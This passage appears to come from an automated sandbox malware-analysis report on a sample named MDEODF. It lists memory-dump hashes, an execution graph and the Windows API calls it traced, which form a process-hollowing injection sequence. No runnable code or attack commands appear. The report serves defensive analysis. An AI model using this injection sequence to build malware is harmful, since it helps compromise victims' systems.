                                    • Opcode ID: a078cdbf6f333a4a62ff7f62daf17899f65f2fc9e07c52628469c749deee0574
                                    • Instruction ID: 600d81742f4e6b7a3958b4fc25062223c3eddf70163431f7fa94f44781c3fdfe
                                    • Opcode Fuzzy Hash: a078cdbf6f333a4a62ff7f62daf17899f65f2fc9e07c52628469c749deee0574
                                    • Instruction Fuzzy Hash: 8001E470C09249DFCB12DFB8D894ADDBFB0AF06200F1446EEC445A72A2EB318A94CB41
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: af0a75c188988b8935d5b61ff69e9796036712b468b15873ef9cff3f5baefaf8
                                    • Instruction ID: 2a6b3a6ca18baabea358fd8632a1a93df948af0f4b1f39e3b28271318d4e0ea1
                                    • Opcode Fuzzy Hash: af0a75c188988b8935d5b61ff69e9796036712b468b15873ef9cff3f5baefaf8
                                    • Instruction Fuzzy Hash: 99F0B274C0020DDFCB45EFA8D945AAEBBB4FB45300F1046AAC419A7250EB709A84CB80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.376998229.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_360000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (e)$@T)$@T)$dp$#q^
                                    • API String ID: 0-1851065574
                                    • Opcode ID: 24c2812e357b9a7b282ce2987ecd1d45d2287b0834e9ef3034c259862bba8116
                                    • Instruction ID: 57cfcbcc8e9fe7fd43c6976074e959c4b3bfb885a3ff65a2977239c36627ba39
                                    • Opcode Fuzzy Hash: 24c2812e357b9a7b282ce2987ecd1d45d2287b0834e9ef3034c259862bba8116
                                    • Instruction Fuzzy Hash: C9829074A00229CFCB25DFA8D884BDDB7B5BF49304F1485AAD409AB265DB70AE85CF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.376998229.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_360000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: dP)
                                    • API String ID: 0-1217822678
                                    • Opcode ID: e9ffe9d23f9b23c0d5339d6d5d3f8cf0ce7e4595e833670526adc475b3fd24cf
                                    • Instruction ID: 90003c344277bc77f646ec5ae40a75442990f9d0ad4be59e8c32784bee21748d
                                    • Opcode Fuzzy Hash: e9ffe9d23f9b23c0d5339d6d5d3f8cf0ce7e4595e833670526adc475b3fd24cf
                                    • Instruction Fuzzy Hash: 213194709193859FC707EB78E4587893FB0AF47305B4548E6C080CF16BD6384989CBA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.376998229.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_360000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: pR)
                                    • API String ID: 0-1636767480
                                    • Opcode ID: 81080da939719ca5efb2907a9f3f328ef229c999a7bc095aa4d93ba32ce8d8c2
                                    • Instruction ID: 1820a2285b41978f8f447a616033534ae286e636b36064ce4ff3f88938635c9c
                                    • Opcode Fuzzy Hash: 81080da939719ca5efb2907a9f3f328ef229c999a7bc095aa4d93ba32ce8d8c2
                                    • Instruction Fuzzy Hash: 2B212A71E002499FCF05DFB9D454ADDBBB1EF49310F8581A6D864BB261D730A94ACF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.376998229.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_360000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: dP)
                                    • API String ID: 0-1217822678
                                    • Opcode ID: 9d6415ac4dfa9777f50a5d9aaf5d38574a0d66cb2336ac7e28dbdd924295a8a3
                                    • Instruction ID: 3b6b6dcca4be3b1d91744a88025ce591cc2c88964cb8b5011f32e9beab599a4a
                                    • Opcode Fuzzy Hash: 9d6415ac4dfa9777f50a5d9aaf5d38574a0d66cb2336ac7e28dbdd924295a8a3
                                    • Instruction Fuzzy Hash: DC114F74910709EFCB06FFA8E449B4D7BB1FF49305F408D65D0149B269DB749A8A8F90
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.376998229.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_360000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ac70a06baab4f654046fafd9fd5b9db789b49d95868e49a0b57988923b3cc73f
                                    • Instruction ID: 79f7ad21a0fb5ba38ef7e98836afa7693cb4fcf58f843c25b84593319b72e2a0
                                    • Opcode Fuzzy Hash: ac70a06baab4f654046fafd9fd5b9db789b49d95868e49a0b57988923b3cc73f
                                    • Instruction Fuzzy Hash: BDF08C70C043498ADF02CFA6D4143EEBBF4EB8A310F1490AAD454B7205D7784949CFA0
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.376998229.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_360000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c2e5aa01c5979673d940fdb2d82bcb3bb2b078051ea9c8fd5506dda03113c6e4
                                    • Instruction ID: cae98f6db49b2f7cf473e911b6889bb8edee566dce618dd3f934dc25935c4728
                                    • Opcode Fuzzy Hash: c2e5aa01c5979673d940fdb2d82bcb3bb2b078051ea9c8fd5506dda03113c6e4
                                    • Instruction Fuzzy Hash: F4F0B274C0020EDFCB45EFA8E945AAEBBB4FB45304F1046AAC415A7254EB709A44CB80

                                    Execution Graph

                                    Execution Coverage:33.5%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:307
                                    Total number of Limit Nodes:0
                                    execution_graph 5835 1d9db0 5836 1d9dcc 5835->5836 5846 1dabba 5836->5846 5887 1dabc4 5836->5887 5928 1daa82 5836->5928 5969 1dabd1 5836->5969 5837 1d9e85 6010 1dc921 5837->6010 5838 1d9ee7 6051 1dd6ba 5838->6051 5847 1dabbe 5846->5847 6098 1dbe50 5847->6098 6103 1dbe40 5847->6103 5848 1daf03 5877 1dbe50 2 API calls 5848->5877 5878 1dbe40 2 API calls 5848->5878 5849 1daf47 6108 1dc458 5849->6108 6112 1dc451 5849->6112 5850 1dafcd 5881 1dbe50 2 API calls 5850->5881 5882 1dbe40 2 API calls 5850->5882 5851 1db059 6116 1dc558 5851->6116 6120 1dc550 5851->6120 5852 1db097 5865 1dbe50 2 API calls 5852->5865 5866 1dbe40 2 API calls 5852->5866 5853 1db1c0 6124 1dc670 5853->6124 6128 1dc678 5853->6128 5854 1db1fc 5873 1dbe50 2 API calls 5854->5873 5874 1dbe40 2 API calls 5854->5874 5855 1db584 5863 1dc678 NtWriteVirtualMemory 5855->5863 5864 1dc670 NtWriteVirtualMemory 5855->5864 5856 1db68d 5875 1dbe50 2 API calls 5856->5875 5876 1dbe40 2 API calls 5856->5876 5857 1db6db 6132 1dc7c8 5857->6132 6136 1dc7d0 5857->6136 5858 1db783 5861 1dc458 NtResumeThread 5858->5861 5862 1dc451 NtResumeThread 5858->5862 5859 1db800 5859->5837 5860 1db25b 5860->5855 5869 1dc678 NtWriteVirtualMemory 5860->5869 5870 1dc670 NtWriteVirtualMemory 5860->5870 5861->5859 5862->5859 5863->5856 5864->5856 5865->5853 5866->5853 5869->5860 5870->5860 5873->5860 5874->5860 5875->5857 5876->5857 5877->5849 5878->5849 5881->5851 5882->5851 5888 1dac1c 5887->5888 5918 1dbe50 2 API calls 5888->5918 5919 1dbe40 2 API calls 5888->5919 5889 1daf03 5924 1dbe50 2 API calls 5889->5924 5925 1dbe40 2 API calls 5889->5925 5890 1daf47 5926 1dc458 NtResumeThread 5890->5926 5927 1dc451 NtResumeThread 5890->5927 5891 1dafcd 5902 1dbe50 2 API calls 5891->5902 5903 1dbe40 2 API calls 5891->5903 5892 1db059 5904 1dc558 VirtualAllocEx 5892->5904 5905 1dc550 VirtualAllocEx 5892->5905 5893 1db097 5912 1dbe50 2 API calls 5893->5912 5913 1dbe40 2 API calls 5893->5913 5894 1db1c0 5914 1dc678 NtWriteVirtualMemory 5894->5914 5915 1dc670 NtWriteVirtualMemory 5894->5915 5895 1db1fc 5920 1dbe50 2 API calls 5895->5920 5921 1dbe40 2 API calls 5895->5921 5896 1db584 5910 1dc678 NtWriteVirtualMemory 5896->5910 5911 1dc670 NtWriteVirtualMemory 5896->5911 5897 1db68d 5922 1dbe50 2 API calls 5897->5922 5923 1dbe40 2 API calls 5897->5923 5898 1db6db 5906 1dc7c8 NtSetContextThread 5898->5906 5907 1dc7d0 NtSetContextThread 5898->5907 5899 1db783 5908 1dc458 NtResumeThread 5899->5908 5909 1dc451 NtResumeThread 5899->5909 5900 1db800 5900->5837 5901 1db25b 5901->5896 5916 1dc678 NtWriteVirtualMemory 5901->5916 5917 1dc670 NtWriteVirtualMemory 5901->5917 5902->5892 5903->5892 5904->5893 5905->5893 5906->5899 5907->5899 5908->5900 5909->5900 5910->5897 5911->5897 5912->5894 5913->5894 5914->5895 5915->5895 5916->5901 5917->5901 5918->5889 5919->5889 5920->5901 5921->5901 5922->5898 5923->5898 5924->5890 5925->5890 5926->5891 5927->5891 5929 1daa86 5928->5929 5953 1dbe50 2 API calls 5929->5953 5954 1dbe40 2 API calls 5929->5954 5930 1daf03 5959 1dbe50 2 API calls 5930->5959 5960 1dbe40 2 API calls 5930->5960 5931 1daf47 5961 1dc458 NtResumeThread 5931->5961 5962 1dc451 NtResumeThread 5931->5962 5932 1dafcd 5963 1dbe50 2 API calls 5932->5963 5964 1dbe40 2 API calls 5932->5964 5933 1db059 5965 1dc558 VirtualAllocEx 5933->5965 5966 1dc550 VirtualAllocEx 5933->5966 5934 1db097 5947 1dbe50 2 API calls 5934->5947 5948 1dbe40 2 API calls 5934->5948 5935 1db1c0 5949 1dc678 NtWriteVirtualMemory 5935->5949 5950 1dc670 NtWriteVirtualMemory 5935->5950 5936 1db1fc 5955 1dbe50 2 API calls 5936->5955 5956 1dbe40 2 API calls 5936->5956 5937 1db584 5945 1dc678 NtWriteVirtualMemory 5937->5945 5946 1dc670 NtWriteVirtualMemory 5937->5946 5938 1db68d 5957 1dbe50 2 API calls 5938->5957 5958 1dbe40 2 API calls 5938->5958 5939 1db6db 5967 1dc7c8 NtSetContextThread 5939->5967 5968 1dc7d0 NtSetContextThread 5939->5968 5940 1db783 5943 1dc458 NtResumeThread 5940->5943 5944 1dc451 NtResumeThread 5940->5944 5941 1db800 5941->5837 5942 1db25b 5942->5937 5951 1dc678 NtWriteVirtualMemory 5942->5951 5952 1dc670 NtWriteVirtualMemory 5942->5952 5943->5941 5944->5941 5945->5938 5946->5938 5947->5935 5948->5935 5949->5936 5950->5936 5951->5942 5952->5942 5953->5930 5954->5930 5955->5942 5956->5942 5957->5939 5958->5939 5959->5931 5960->5931 5961->5932 5962->5932 5963->5933 5964->5933 5965->5934 5966->5934 5967->5940 5968->5940 5970 1dad4c 5969->5970 6000 1dbe50 2 API calls 5970->6000 6001 1dbe40 2 API calls 5970->6001 5971 1daf03 6006 1dbe50 2 API calls 5971->6006 6007 1dbe40 2 API calls 5971->6007 5972 1daf47 6008 1dc458 NtResumeThread 5972->6008 6009 1dc451 NtResumeThread 5972->6009 5973 1dafcd 5984 1dbe50 2 API calls 5973->5984 5985 1dbe40 2 API calls 5973->5985 5974 1db059 5986 1dc558 VirtualAllocEx 5974->5986 5987 1dc550 VirtualAllocEx 5974->5987 5975 1db097 5994 1dbe50 2 API calls 5975->5994 5995 1dbe40 2 API calls 5975->5995 5976 1db1c0 5996 1dc678 NtWriteVirtualMemory 5976->5996 5997 1dc670 NtWriteVirtualMemory 5976->5997 5977 1db1fc 6002 1dbe50 2 API calls 5977->6002 6003 1dbe40 2 API calls 5977->6003 5978 1db584 5992 1dc678 NtWriteVirtualMemory 5978->5992 5993 1dc670 NtWriteVirtualMemory 5978->5993 5979 1db68d 6004 1dbe50 2 API calls 5979->6004 6005 1dbe40 2 API calls 5979->6005 5980 1db6db 5988 1dc7c8 NtSetContextThread 5980->5988 5989 1dc7d0 NtSetContextThread 5980->5989 5981 1db783 5990 1dc458 NtResumeThread 5981->5990 5991 1dc451 NtResumeThread 5981->5991 5982 1db800 5982->5837 5983 1db25b 5983->5978 5998 1dc678 NtWriteVirtualMemory 5983->5998 5999 1dc670 NtWriteVirtualMemory 5983->5999 5984->5974 5985->5974 5986->5975 5987->5975 5988->5981 5989->5981 5990->5982 5991->5982 5992->5979 5993->5979 5994->5976 5995->5976 5996->5977 5997->5977 5998->5983 5999->5983 6000->5971 6001->5971 6002->5983 6003->5983 6004->5980 6005->5980 6006->5972 6007->5972 6008->5973 6009->5973 6011 1dc964 6010->6011 6148 1dd478 6011->6148 6153 1dd488 6011->6153 6012 1dcb1b 6045 1dd478 2 API calls 6012->6045 6046 1dd488 2 API calls 6012->6046 6013 1dcb5f 6047 1dc458 NtResumeThread 6013->6047 6048 1dc451 NtResumeThread 6013->6048 6014 1dcbe5 6049 1dd478 2 API calls 6014->6049 6050 1dd488 2 API calls 6014->6050 6015 1dcc71 6025 1dc558 VirtualAllocEx 6015->6025 6026 1dc550 VirtualAllocEx 6015->6026 6016 1dccaf 6031 1dd478 2 API calls 6016->6031 6032 1dd488 2 API calls 6016->6032 6017 1dcdd8 6035 1dc678 NtWriteVirtualMemory 6017->6035 6036 1dc670 NtWriteVirtualMemory 6017->6036 6018 1dce14 6043 1dd478 2 API calls 6018->6043 6044 1dd488 2 API calls 6018->6044 6019 1dd19c 6033 1dc678 NtWriteVirtualMemory 6019->6033 6034 1dc670 NtWriteVirtualMemory 6019->6034 6020 1dd2a5 6041 1dd478 2 API calls 6020->6041 6042 1dd488 2 API calls 6020->6042 6021 1dce73 6021->6019 6037 1dc678 NtWriteVirtualMemory 6021->6037 6038 1dc670 NtWriteVirtualMemory 6021->6038 6022 1dd2f3 6027 1dc7c8 NtSetContextThread 6022->6027 6028 1dc7d0 NtSetContextThread 6022->6028 6023 1dd39b 6029 1dc458 NtResumeThread 6023->6029 6030 1dc451 NtResumeThread 6023->6030 6024 1dd418 6024->5838 6025->6016 6026->6016 6027->6023 6028->6023 6029->6024 6030->6024 6031->6017 6032->6017 6033->6020 6034->6020 6035->6018 6036->6018 6037->6021 6038->6021 6041->6022 6042->6022 6043->6021 6044->6021 6045->6013 6046->6013 6047->6014 6048->6014 6049->6015 6050->6015 6052 1dd6f4 6051->6052 6158 1de2bd 6052->6158 6163 1de218 6052->6163 6168 1de208 6052->6168 6053 1dd8ab 6093 1de2bd 2 API calls 6053->6093 6094 1de218 2 API calls 6053->6094 6095 1de208 2 API calls 6053->6095 6054 1dd8ef 6096 1dc458 NtResumeThread 6054->6096 6097 1dc451 NtResumeThread 6054->6097 6055 1dd975 6066 1de2bd 2 API calls 6055->6066 6067 1de218 2 API calls 6055->6067 6068 1de208 2 API calls 6055->6068 6056 1dda01 6069 1dc558 VirtualAllocEx 6056->6069 6070 1dc550 VirtualAllocEx 6056->6070 6057 1dda3f 6077 1de2bd 2 API calls 6057->6077 6078 1de218 2 API calls 6057->6078 6079 1de208 2 API calls 6057->6079 6058 1ddb68 6080 1dc678 NtWriteVirtualMemory 6058->6080 6081 1dc670 NtWriteVirtualMemory 6058->6081 6059 1ddba4 6090 1de2bd 2 API calls 6059->6090 6091 1de218 2 API calls 6059->6091 6092 1de208 2 API calls 6059->6092 6060 1ddf2c 6075 1dc678 NtWriteVirtualMemory 6060->6075 6076 1dc670 NtWriteVirtualMemory 6060->6076 6061 1de035 6087 1de2bd 2 API calls 6061->6087 6088 1de218 2 API calls 6061->6088 6089 1de208 2 API calls 6061->6089 6062 1de083 6071 1dc7c8 NtSetContextThread 6062->6071 6072 1dc7d0 NtSetContextThread 6062->6072 6063 1de12b 6073 1dc458 NtResumeThread 6063->6073 6074 1dc451 NtResumeThread 6063->6074 6064 1d9f49 6065 1ddc03 6065->6060 6085 1dc678 NtWriteVirtualMemory 6065->6085 6086 1dc670 NtWriteVirtualMemory 6065->6086 6066->6056 6067->6056 6068->6056 6069->6057 6070->6057 6071->6063 6072->6063 6073->6064 6074->6064 6075->6061 6076->6061 6077->6058 6078->6058 6079->6058 6080->6059 6081->6059 6085->6065 6086->6065 6087->6062 6088->6062 6089->6062 6090->6065 6091->6065 6092->6065 6093->6054 6094->6054 6095->6054 6096->6055 6097->6055 6099 1dbe74 6098->6099 6140 1dc328 6099->6140 6144 1dc320 6099->6144 6100 1dbf29 6100->5848 6104 1dbe45 6103->6104 6106 1dc328 NtReadVirtualMemory 6104->6106 6107 1dc320 NtReadVirtualMemory 6104->6107 6105 1dbf29 6105->5848 6106->6105 6107->6105 6109 1dc49c NtResumeThread 6108->6109 6111 1dc4f3 6109->6111 6111->5850 6113 1dc458 NtResumeThread 6112->6113 6115 1dc4f3 6113->6115 6115->5850 6117 1dc59c VirtualAllocEx 6116->6117 6119 1dc614 6117->6119 6119->5852 6121 1dc558 VirtualAllocEx 6120->6121 6123 1dc614 6121->6123 6123->5852 6125 1dc678 NtWriteVirtualMemory 6124->6125 6127 1dc75a 6125->6127 6127->5854 6129 1dc6c1 NtWriteVirtualMemory 6128->6129 6131 1dc75a 6129->6131 6131->5854 6133 1dc819 NtSetContextThread 6132->6133 6135 1dc891 6133->6135 6135->5858 6137 1dc819 NtSetContextThread 6136->6137 6139 1dc891 6137->6139 6139->5858 6141 1dc374 NtReadVirtualMemory 6140->6141 6143 1dc3ec 6141->6143 6143->6100 6145 1dc328 NtReadVirtualMemory 6144->6145 6147 1dc3ec 6145->6147 6147->6100 6149 1dd4ac 6148->6149 6151 1dc328 NtReadVirtualMemory 6149->6151 6152 1dc320 NtReadVirtualMemory 6149->6152 6150 1dd561 6150->6012 6151->6150 6152->6150 6154 1dd4ac 6153->6154 6156 1dc328 NtReadVirtualMemory 6154->6156 6157 1dc320 NtReadVirtualMemory 6154->6157 6155 1dd561 6155->6012 6156->6155 6157->6155 6159 1de2cd 6158->6159 6161 1dc328 NtReadVirtualMemory 6159->6161 6162 1dc320 NtReadVirtualMemory 6159->6162 6160 1de2f1 6160->6053 6161->6160 6162->6160 6164 1de23c 6163->6164 6166 1dc328 NtReadVirtualMemory 6164->6166 6167 1dc320 NtReadVirtualMemory 6164->6167 6165 1de2f1 6165->6053 6166->6165 6167->6165 6169 1de23c 6168->6169 6171 1dc328 NtReadVirtualMemory 6169->6171 6172 1dc320 NtReadVirtualMemory 6169->6172 6170 1de2f1 6170->6053 6171->6170 6172->6170 6173 1db870 6175 1db900 CreateProcessW 6173->6175 6176 1dbcd4 6175->6176

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 950 1db870-1db92a 952 1db930-1db96b 950->952 953 1db9e2-1db9f7 950->953 969 1db96d-1db975 952->969 970 1db9a3-1db9b4 952->970 954 1db9fd-1dba43 953->954 955 1dbaa7-1dbaab 953->955 977 1dba45-1dba4d 954->977 978 1dba81-1dba8c 954->978 956 1dbaad-1dbaef 955->956 957 1dbaf5-1dbb46 955->957 956->957 960 1dbb4c-1dbb87 957->960 961 1dbbfe-1dbc10 957->961 987 1dbbbf-1dbbd0 960->987 988 1dbb89-1dbb91 960->988 964 1dbc2d-1dbc3f 961->964 965 1dbc12-1dbc2a 961->965 967 1dbc5c-1dbcd2 CreateProcessW 964->967 968 1dbc41-1dbc59 964->968 965->964 972 1dbcdb-1dbd1c 967->972 973 1dbcd4-1dbcda 967->973 968->967 975 1db998-1db9a1 969->975 976 1db977-1db981 969->976 979 1db9ba-1db9da 970->979 998 1dbd1e-1dbd2d 972->998 999 1dbd33-1dbd4a 972->999 973->972 975->979 982 1db985-1db994 976->982 983 1db983 976->983 984 1dba4f-1dba59 977->984 985 1dba70-1dba7f 977->985 986 1dba92-1dbaa1 978->986 979->953 982->982 995 1db996 982->995 983->982 993 1dba5d-1dba6c 984->993 994 1dba5b 984->994 985->986 986->955 1003 1dbbd6-1dbbf6 987->1003 996 1dbbb4-1dbbbd 988->996 997 1dbb93-1dbb9d 988->997 993->993 1000 1dba6e 993->1000 994->993 995->975 996->1003 1001 1dbb9f 997->1001 1002 1dbba1-1dbbb0 997->1002 998->999 1008 1dbd4c-1dbd58 999->1008 1009 1dbd63-1dbd73 999->1009 1000->985 1001->1002 1002->1002 1005 1dbbb2 1002->1005 1003->961 1005->996 1008->1009 1010 1dbd8a-1dbdcd 1009->1010 1011 1dbd75-1dbd84 1009->1011 1016 1dbddd-1dbde1 1010->1016 1017 1dbdcf-1dbdd3 1010->1017 1011->1010 1019 1dbdf1-1dbdf5 1016->1019 1020 1dbde3-1dbde7 1016->1020 1017->1016 1018 1dbdd5-1dbdd8 call 1d0420 1017->1018 1018->1016 1022 1dbe05 1019->1022 1023 1dbdf7-1dbdfb 1019->1023 1020->1019 1021 1dbde9-1dbdec call 1d0420 1020->1021 1021->1019 1023->1022 1026 1dbdfd-1dbe00 call 1d0420 1023->1026 1026->1022
                                    APIs
                                    • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 001DBCBF
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 41e93d0219011b80b6c74ba536b34dfd7825db7ed4f0e24d93e8f3bdce2cabcb
                                    • Instruction ID: ee113d7ea1842b493b48225bb207a187e82794c086833917436512780e0cb1f0
                                    • Opcode Fuzzy Hash: 41e93d0219011b80b6c74ba536b34dfd7825db7ed4f0e24d93e8f3bdce2cabcb
                                    • Instruction Fuzzy Hash: 1E02D074E04229CFDB24CFA9C880B9DBBF2BF49304F1181AAE419A7351DB349A85CF55

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1334 1dc670-1dc6e0 1337 1dc6f7-1dc758 NtWriteVirtualMemory 1334->1337 1338 1dc6e2-1dc6f4 1334->1338 1340 1dc75a-1dc760 1337->1340 1341 1dc761-1dc7b3 1337->1341 1338->1337 1340->1341
                                    APIs
                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 001DC748
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: MemoryVirtualWrite
                                    • String ID:
                                    • API String ID: 3527976591-0
                                    • Opcode ID: 60bf3f52a32f92542157c5de298e497f983e640582e3015a8a3acfa7d3755f33
                                    • Instruction ID: 30eb0a845db94223873189ddb9c6b1cc4a800e91ec4c97fe6ae9ae5a0fb2fc89
                                    • Opcode Fuzzy Hash: 60bf3f52a32f92542157c5de298e497f983e640582e3015a8a3acfa7d3755f33
                                    • Instruction Fuzzy Hash: 1C41B9B5D002599FCF00CFA9D984AEEFBF1AB49314F24942AE814B7250D378AA45CF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1346 1dc678-1dc6e0 1348 1dc6f7-1dc758 NtWriteVirtualMemory 1346->1348 1349 1dc6e2-1dc6f4 1346->1349 1351 1dc75a-1dc760 1348->1351 1352 1dc761-1dc7b3 1348->1352 1349->1348 1351->1352
                                    APIs
                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 001DC748
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: MemoryVirtualWrite
                                    • String ID:
                                    • API String ID: 3527976591-0
                                    • Opcode ID: 5a9d50e741487051df36a0dc5311371e221d4d61ea0dbfb76bfa98236acac77c
                                    • Instruction ID: 568e0c049c6507e5347ec49759738b978457456e5ae63fdaac45e76a0d1fe95f
                                    • Opcode Fuzzy Hash: 5a9d50e741487051df36a0dc5311371e221d4d61ea0dbfb76bfa98236acac77c
                                    • Instruction Fuzzy Hash: 2B41A8B5D012599FCF00CFA9D984AEEFBF1AB49314F24942AE814B7250D338AA45CF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1357 1dc320-1dc3ea NtReadVirtualMemory 1361 1dc3ec-1dc3f2 1357->1361 1362 1dc3f3-1dc445 1357->1362 1361->1362
                                    APIs
                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 001DC3DA
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: MemoryReadVirtual
                                    • String ID:
                                    • API String ID: 2834387570-0
                                    • Opcode ID: 0e09f698b6ed11a7b6d3d9e36fc084a39ae92b704d63c1a642e13c5dea830c78
                                    • Instruction ID: c3fc9ba500cfb6af42c1365426989352282644c9c4f24217e7d3ec288329906f
                                    • Opcode Fuzzy Hash: 0e09f698b6ed11a7b6d3d9e36fc084a39ae92b704d63c1a642e13c5dea830c78
                                    • Instruction Fuzzy Hash: 2341A8B9D002599FCF10CFAAD984AEEFBB1BB49310F10942AE814B7250D735A945CF68

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1367 1dc328-1dc3ea NtReadVirtualMemory 1370 1dc3ec-1dc3f2 1367->1370 1371 1dc3f3-1dc445 1367->1371 1370->1371
                                    APIs
                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 001DC3DA
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: MemoryReadVirtual
                                    • String ID:
                                    • API String ID: 2834387570-0
                                    • Opcode ID: 123cb2f1c16339cbc873813af1bd1869d03f6f5dd49115860194aa76838cbd85
                                    • Instruction ID: 595ff9c8bdaeb8db5d3e7bcc3bddb53d3377de0feea45edc87df8d4558db6d61
                                    • Opcode Fuzzy Hash: 123cb2f1c16339cbc873813af1bd1869d03f6f5dd49115860194aa76838cbd85
                                    • Instruction Fuzzy Hash: 3F4197B9D002599FCF10CFAAD984AEEFBB1BB49310F14942AE814B7210D775A945CF68
                                    APIs
                                    • NtSetContextThread.NTDLL(?,?), ref: 001DC87F
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: ContextThread
                                    • String ID:
                                    • API String ID: 1591575202-0
                                    • Opcode ID: 994d981c1ee0d076fd0cb8de86361c4dfb38ab9a620d9fc06fb4ea9abc59e5eb
                                    • Instruction ID: d442734a97ef16a5c512bcb8b45e5ef6458d0ec4485a4b471a61cbb767bbdb7b
                                    • Opcode Fuzzy Hash: 994d981c1ee0d076fd0cb8de86361c4dfb38ab9a620d9fc06fb4ea9abc59e5eb
                                    • Instruction Fuzzy Hash: 774199B5D002599FCB14CFA9D984AEEFBF1AB49314F24842AE414B7244C778A949CF94
                                    APIs
                                    • NtSetContextThread.NTDLL(?,?), ref: 001DC87F
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd
                                    Similarity
                                    • API ID: ContextThread
                                    • String ID:
                                    • API String ID: 1591575202-0
                                    • Opcode ID: 4c0fbc0ae8794f377880f819eac391998ee97f7bdfdde187e55c3e576ecf1c66
                                    • Instruction ID: 2edf8a8986fcc3d8637ce88ab1227134076fd5c02e8207876d2b2010bfd5d9cf
                                    • Opcode Fuzzy Hash: 4c0fbc0ae8794f377880f819eac391998ee97f7bdfdde187e55c3e576ecf1c66
                                    • Instruction Fuzzy Hash: D731BAB4D002599FCB14CFAAD984AEEFBF1AF49314F24842AE414B7240C778A949CF94
                                    APIs
                                    • NtResumeThread.NTDLL(?,?), ref: 001DC4E1
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
